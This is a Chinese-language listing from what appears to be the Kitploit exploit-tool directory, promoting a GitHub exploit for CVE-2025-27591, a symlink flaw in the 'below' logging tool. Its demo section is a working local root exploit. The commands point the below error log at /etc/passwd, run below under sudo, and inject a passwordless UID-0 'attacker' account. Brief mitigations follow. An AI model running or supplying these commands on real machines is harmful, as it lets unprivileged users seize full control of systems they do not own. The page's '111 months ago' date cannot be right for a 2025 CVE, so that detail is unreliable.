Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/krn966/cve-2025-27591
权限提升漏洞利用框架漏洞分析漏洞利用
GitHubkrn966/cve-2025-27591

CVE-2025-27591

CVE-2025-27591 的本地权限提升漏洞利用,滥用以下工具日志记录中不安全的符号链接处理,以 root 身份覆盖任意文件。

查看仓库
111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-27591 - 通过不安全的日志处理实现权限提升

概述

CVE-2025-27591 是 below 工具(补丁发布之前的版本)中的一个本地权限提升漏洞,由日志机制中的不安全符号链接处理引起。具有本地访问权限的攻击者可以利用此漏洞以 root 用户身份覆盖任意文件,从而实现完全权限提升。

漏洞详情

below 工具将日志写入 /var/log/below/,但未正确验证符号链接。通过预先创建指向敏感文件(例如 /etc/passwd)的符号链接,攻击者可以在易受攻击的进程通过 sudo 运行时,以提升的权限注入任意内容。

漏洞利用演示

root@kitploit:~
# 检查日志目录是否存在
test -d /var/log/below && ls -ld /var/log/below

# 删除现有日志文件并创建恶意符号链接
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

# 准备恶意 passwd 条目
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker

# 使用 sudo 触发易受攻击的行为
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log

# 切换到新创建的具有 root 权限的用户
su attacker

影响

成功利用此漏洞可使本地非特权攻击者获得 root 权限,从而完全控制整个系统。

缓解措施

  • 补丁发布后立即应用供应商补丁。
  • 限制对 /var/log/below/ 目录的访问权限。
  • 在写入前验证日志文件路径,避免跟随符号链接。
下载工具